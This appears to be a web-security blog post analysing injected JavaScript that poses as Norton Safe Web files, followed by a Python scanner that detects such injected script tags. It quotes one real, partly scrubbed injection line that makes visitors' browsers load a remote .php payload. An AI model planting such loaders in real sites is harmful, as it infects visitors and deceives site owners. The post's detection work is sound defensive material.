Web-Malware Faking Norton

    The growth of web-based malware continues unabated. Malware developers are targeting websites as a way to distribute viruses, Trojans and other harmful programs. This modus operandi banks on the fact that most websites have weak security and can be compromised easily; in fact, even the top 15 financial institutions have vulnerabilities. In this article we describe another relatively new trick that malware developers are using to keep their malicious code from being noticed.

    The Phenomenon
    Website compromise is a growing trend. More than 6,600 new websites are hacked every single day; as a result they become distributors of malware and end up blacklisted. These sites lose business and customer trust, and a compromised site can also become one link in a chain of information theft.

    Fake anti-virus advertisements have been around for a long time. Niels Provos of Google posted a great article about this, and Symantec (Norton) has also published information on the trend. Malware authors are playing on the tendency of unsuspecting users to trust any software that says “Anti-Virus” or “Malware Scan” on it.

    Web-Malware Posing as Norton Anti-Virus
    This post does not simply discuss fake anti-virus posing as the real thing; it also looks at web malware whose file names resemble those of anti-virus software. We discuss the emerging trend of malware authors finding insecure websites and compromising them through “code injection”: malicious code is inserted into a page of the site and is executed whenever the infected page is viewed in a visitor's browser (Internet Explorer, Safari, Firefox, Opera, etc.). The owner of the website is usually completely unaware that such an attack has taken place. Below is an example of a piece of malicious code found on an unsuspecting website (the attacker's directory and file names have been scrubbed).

    document.write('<script src=http://ftmlive.com/[scrubbed]/nortonsw_[scrubbed].php></script>');

    This particular code was found on a page of pinnaclevillas.com. The script it loads was hosted on ftmlive.com, where the malware was observed on 2010-11-06.

    Conclusion
    This is just one of the many examples we see every day of malware pretending to be a legitimate piece of software. In this case the file that actually loads the attack payload has “nortonsw” in its name, in the hope that an administrator or user who notices it will assume it is a Norton Anti-Virus related file.

    Interestingly, this naming convention is the one used by Norton's Safe Web service, where administrators must put up a page on their site with a name of the form “nortonsw_(unique code).html” so that Norton can verify the site. It appears that the attackers are imitating the file name that Norton Safe Web's verification mechanism uses in order to cloak their malicious code. The differences are still visible to anyone who looks closely: the genuine verification file is a static .html page on the site's own domain that Norton fetches, not a script that visitors' browsers execute, whereas the injected file is a .php script pulled from a third-party host. This use of familiar naming conventions is on the rise.
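    To make the two points above concrete (an injected script tag that visitors' browsers execute without the site owner noticing, and the nortonsw_ naming trick), here is a small Python scanner added for this article. It is not code from the original post, from Norton, or from any tool the post mentions. It walks a page's HTML, collects every script the page loads, including ones hidden inside document.write() calls, and flags those that use the Norton Safe Web verification name for something the genuine verification page never is: a script, a .php file, or a file served from another host. The sample page, the host names passed in and the allowlist are constructed for the example; the only line taken from the post is the scrubbed injected snippet.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A <script src=...> tag hidden inside a JavaScript string literal, the shape an
# injected document.write('<script src=http://...></script>') call takes.
WRITTEN_SCRIPT_RE = re.compile(
    r"""<\s*script[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collects every script a page loads, either from a real <script src>
    tag or from a document.write() call inside an inline script block."""

    def __init__(self):
        super().__init__()
        self.refs = []            # list of (src, origin) pairs
        self._script_text = None  # buffer for the inline script being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.refs.append((src, "script tag"))
            self._script_text = []

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._script_text is not None:
            text = "".join(self._script_text)
            self._script_text = None
            if "document.write" in text:
                for src in WRITTEN_SCRIPT_RE.findall(text):
                    self.refs.append((src, "document.write"))


def _strip_www(host):
    """Lower-case a host name and drop a leading 'www.' so hosts compare equal."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def classify(src, origin, site_host, allowlist=()):
    """Return the reasons a script reference looks injected (empty = nothing odd).

    Rule of thumb from the post: the genuine Norton Safe Web artefact is a static
    nortonsw_<code>.html page on the site's own host that Norton fetches. It is
    not a script that visitors' browsers run, and never a remote .php file.
    """
    site_host = _strip_www(site_host)
    host = _strip_www(urlparse(src).netloc)      # '' for a relative URL
    allowed = {_strip_www(h) for h in allowlist}
    basename = urlparse(src).path.rsplit("/", 1)[-1].lower()
    reasons = []
    if basename.startswith("nortonsw_"):
        reasons.append("Norton Safe Web verification name used as a script source")
        if host and host != site_host:
            reasons.append("nortonsw_ file fetched from another host: " + host)
        if not basename.endswith(".html"):
            reasons.append("nortonsw_ name with a server-side extension instead of .html")
    if origin == "document.write" and host and host != site_host and host not in allowed:
        reasons.append("third-party script injected through document.write")
    return reasons


def scan_page(html, site_host, allowlist=()):
    """Return the suspicious script references in html as dicts holding the
    source URL, how it was loaded, and the reasons it was flagged."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src, origin in collector.refs:
        reasons = classify(src, origin, site_host, allowlist)
        if reasons:
            findings.append({"src": src, "origin": origin, "reasons": reasons})
    return findings


# Constructed sample of a compromised page. Only the document.write line mirrors
# the scrubbed snippet from the post; everything else is made up for the example.
SAMPLE_PAGE = """<html><head><title>Villas</title>
<script src="/js/site.js"></script>
<script type="text/javascript">
var page = 'home';
document.write('<script src=http://ftmlive.com/[scrubbed]/nortonsw_[scrubbed].php></scr'+'ipt>');
</script>
</head><body><p>Welcome</p>
<script src="https://www.google-analytics.com/ga.js"></script>
</body></html>"""

if __name__ == "__main__":
    # Assumed site host for the sample; pass the real host of the page scanned.
    for finding in scan_page(SAMPLE_PAGE, "pinnaclevillas.com"):
        print("%s (%s)" % (finding["src"], finding["origin"]))
        for reason in finding["reasons"]:
            print("  - " + reason)
```

    Run it over the HTML of every page on the site (a crawl or a walk of the document root). A clean site reports nothing; a legitimate third-party script that happens to be loaded through document.write can be added to the allowlist, but nothing that carries the nortonsw_ name should ever be loaded as a script, so those findings are worth treating as a compromise until proven otherwise.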

    Till next time… when we post more interesting code samples and analysis.